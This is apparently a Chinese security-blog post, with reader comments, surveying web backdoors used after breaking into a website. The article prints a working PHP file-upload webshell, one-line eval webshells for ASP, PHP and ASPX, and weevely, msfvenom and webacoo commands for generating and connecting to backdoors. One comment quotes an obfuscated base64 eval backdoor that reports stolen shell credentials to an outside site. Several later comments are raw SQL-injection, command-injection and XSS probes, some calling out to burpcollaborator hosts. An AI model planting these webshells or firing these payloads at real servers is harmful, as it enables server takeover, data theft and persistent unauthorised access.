在对一个web站点进行渗透测试的渗透攻击阶段,一般会想办法突破上传限制,向目标可执行目录中写入一个带有攻击性质的脚本来协助获取更大的服务器权限。
这里我们就一起来盘点一下常用的web后门吧
大马与小马
在几年前很流行的网站入侵打油诗中有写
进谷歌 找注入
没注入 就旁注
没旁注 用0day
没0day 猜目录
没目录 就嗅探
爆账户 找后台
传小马 放大马
拿权限 挂页面
放暗链 清数据
清日志 留后门
其中的传小马上大马就是我们要说的小马大马了,小马的功能一般都比较单一,作用一般是向服务器中写入文件数据。因为其功能单一的特性,隐蔽性通常都比较高。有些网站对上传文件大小做了限制,小马因为占用空间也小也能绕过这些限制
这里贴一个php小马
<?php
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
<form method="POST">
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>">
<br><br>
<textarea name="text" COLS="70" ROWS="18" ></textarea>
<br><br>
<input type="submit" name="submit" value="保存">
<form>
<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!';
@fclose($fp);
}
?>
大马一般就提供了更多的功能,例如辅助提权,执行sql语句,反弹shell等。
不过网上很多的大马都加了后门,例如图中的这款从mumaasp.com这个网站下载的一款大马会将木马的地址和密码提交到http://www.mumaasp.com/xz/sx.asp这个网址
中国菜刀
中国菜刀和一句话木马想必是大家最熟悉的了,中国菜刀支持asp、php、asp.net和jsp等web编程语言,小巧的中国菜刀还自带了很多实用的功能。例如虚拟终端
还有例如安全扫描,定时闹钟,数据库管理等功能,甚至内置了一个网页浏览器
使用方法也很简单,就是往目标web服务器上传相应的一句话木马
asp一句话木马:
<%execute(request("pass"))%>
php一句话木马:
<?php @eval($_POST[pass]);?>
aspx一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["pass"])%>
网上也有很多仿冒中国菜刀的官网发布加了后门的中国菜刀
在linux下也有很多替代中国菜刀的开源产品,例如中国蚁剑和C刀
weevely
在kali linux中,我们用的比较多的就是这款php后门管理工具 weevely了。weevely支持的功能很强大,使用http头进行指令传输。唯一的缺陷就是只支持php
我们通过帮助可以看到,weevely的使用还是很简单的,首先我们在/root目录下生成一个名为weevely.php密码为123的backdoor agent
weevely generate 123 /root/weevely.php
然后我们只要上传到目标服务器之后运行
weevely <目标URL> <密码>就能成功连接上了
metasploit
metasploit框架中其实也自带了php的后门,并且配合meterpreter功能强大
在这里提一下正向连接和反向连接(bind_tcp reverse_tcp)
bind_tcp:在这里黑客主动去连接目标主机,就叫作正向连接。适用的情况是服务器在外网的情况
reverse_tcp:在这个例子中反向连接就是被入侵的主机反过来来连接黑客,就叫作反向连接,在目标服务器在内网或有防火墙的情况下使用。
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
其中lhost为目标服务器的地址 lport是目标服务器会开放的端口 -o后面是后门输出的路径
然后进入msfconsole
xu
选择exploit/multi/handler这个模块
然后设置payload为php/meterpreter/bind_tcp
最后设置一下目标的ip然后输入run开始监听
触发木马的方法就是访问后门的网址
然后msfconsole如果有连接信息说明已经连接成功
使用方式可以参考meterpreter
参考链接](http://www.evil0x.com/posts/838.html
webacoo
webacoo是用base64编码后隐藏在Cookie头中,隐蔽性较强,webacoo的缺点是不能指定密码,所以。。。不推荐作为持续性攻击的权限维持的选择
webacoo -g -o /root/webacoo.php
生成webacoo.php存放在/root目录下
上传成功之后用命令
webacoo -t -u 来连接
成功后会生成一个仿真终端,可以使用load命令来加载模块,之后可以进行上传下载,连接数据库等操作。只是不能设置密码是个硬伤。
参考网站:http://www.jb51.net/article/30234.htm
*本文作者:你会忘了我,转载请注明来自FreeBuf
-
第一次写的东西见报了,虽然没有什么技术含量但是还是很开心,蛤蛤
关注我们 分享每日精选文章
活动预告
-
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束 -
10月
已结束 -
10月
已结束 -
9月
已结束
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
0daybank
已有 50 条评论
第一次写的东西见报了,虽然没有什么技术含量但是还是很开心,蛤蛤
看完这篇文章,尴尬证都犯了。。。不会回复了,楼下帮忙回复一下?
@ winalva 小菜技术不行,会慢慢提高写更优质的文章的
给个大马代码吧
支持一下
鼓励!! 要不再推出常见的 linux 和 windows 后门! 感觉效果更好一点!!!
学习了
旁注好。
支持一下
菜刀还是别用了,不论有没有后门都能被监控到。。
@ 河蟹 愿闻其详!
所以,你不打算分享一两个没有后门、功能多、方便实用的大马出来?
@ NOL4rb 嘿嘿 所以我下面就介绍了很多其他代替大马的方式啊。功能强大也更隐蔽
大马不分享,小马有毛用
@ wxxxxxx 有种你分享啊 人家第一次发表鼓励下会吗?没教养
@ wxxxxxx @ 叫爷爷 大家别吵起来呀
嘿嘿 正好补充下
文中那个事例木马就是mumaasp里下的 不过带了后门,后门在218-220行用notepad++打开,把218-220行删了就行了
下面就是218-220行的代码
<?
eval(gzinflate(base64_decode(‘fY9Ra4MwFIXfB/sPkknTQpG5SKk4B9takZJWZ2VjSBGbhOkwMxhtO3/9dK3bHsoeLtx7z3fu4aqSlTtW1oqtqPF6HjzPAyWCbhj6seutQ7jR+nUEfddve+zAjXV5oR6NojMmlGcfERSJlEeNFOKzLvNW2yaSTYyYMlJQNoQLfrj20Oqd8HxPHx8awpfmIls2XlgV1A32XjbdUUQR5rq+fXFSgu7r1xuzwiidYLQyMHcaMjN1/8m24ehP1LmsxpjiPmtmnHhZlXZv0k5P1BoYCBv0o9B+rmoA9Ka24pKJPCFsCAZ5ZYExuAXjThudZ96+mbt/mStkdhD8hRhJC6UbrC8=’)));
?>
有兴趣可以自己用base64解密一下分析分析 最后就是将木马所在的地址和密码提交给
http://www.mumaasp.com/xz/sx.asp
这个webshell箱子,大家也可以去网上找,然后本地用浏览器控制台(火狐浏览器要安装firebug,360极速浏览器自带了按F12 然后转到network标签)实验一下如果有后门的话自己把后门给去了就行了
@ 你会忘了我 哈哈哈 好的 号嗒
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
php/meterpreter/bind_tcp payload中,没有lhost option吧?
@ wwwillgaiiam 谢谢指出,确实是这样的,疏忽了。实在是抱歉
这里正好补充一下查看payload信息的参数是 msfvenom -p php/meterpreter/bind_tcp –payload-options
默认设置了lport为4444
也可以在生成的时候不指定rhost和lport但是在msfconsole配置过程中一定要指定rhost也就是目标服务器的IP
@ 你会忘了我 学习了,很棒
4sjj9ycpbh
document%2etitle%3d1
@ 你会忘了我 学习了,很棒’ and (select*from(select(sleep(20)))a)–
@ 你会忘了我 学习了,很棒|ping -c 21 127.0.0.1||x
t82vif8wbvfmhdgbsyeqlybao1usmge820pqdf
alert(1)
c6zw17z5ow%3e%3c
@ 你会忘了我 学习了,很棒’);declare @q varchar(99);set @q=’\\i0jka40l3k7b9280kn6fdn3zgqmhe55ytqgg45.burpcollab’+'orator.net\kjf’; exec master.dbo.xp_dirtree @q;–
@ 你会忘了我 学习了,很棒,(select*from(select(sleep(20)))a)
@ 你会忘了我 学习了,很棒’,0)waitfor delay’0:0:0′–
@ 你会忘了我 学习了,很棒’.sleep(20).’
@ 你会忘了我 学习了,很棒’ and ’6924′=’6924
@ 你会忘了我 学习了,很棒"
pvvlo<a>ytf8z
luhjbvh7q2><
@ 你会忘了我 学习了,很棒;declare @q varchar(99);set @q=’\\t0uvaf0w3v7m9d8bky6qdy3ag1mseg56tygo4d.burpcollab’+'orator.net\inn’; exec master.dbo.xp_dirtree @q;–
@ 你会忘了我 学习了,很棒’+(select load_file(‘\\\\6378ds3968azcqbonb93gb6njep5ht8wwoje73.burpcollaborator.net\\iuf’))+’
@ 你会忘了我 学习了,很棒’ waitfor delay’0:0:20′–
@ 你会忘了我 学习了,很棒’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,'a’,'single’))+’
@ 你会忘了我 学习了,很棒17291191′ or 8698=8698–
@ 你会忘了我 学习了,很棒’ and 4043=4044–
牛逼 膜拜
愣是看的一脸懵逼 大腿们你们都是怎么学这行的教教我
我擦,楼上发生了什么
@ istr33 我也好奇,楼上发生了什么
学习了
楼上在测试本站的SQL注入.
菜鸟学习下zz
楼主是个妹子,鉴定完毕!
推荐一波基于终端的 webshell 管理工具 : https://github.com/wangyihang/Webshell-Sniper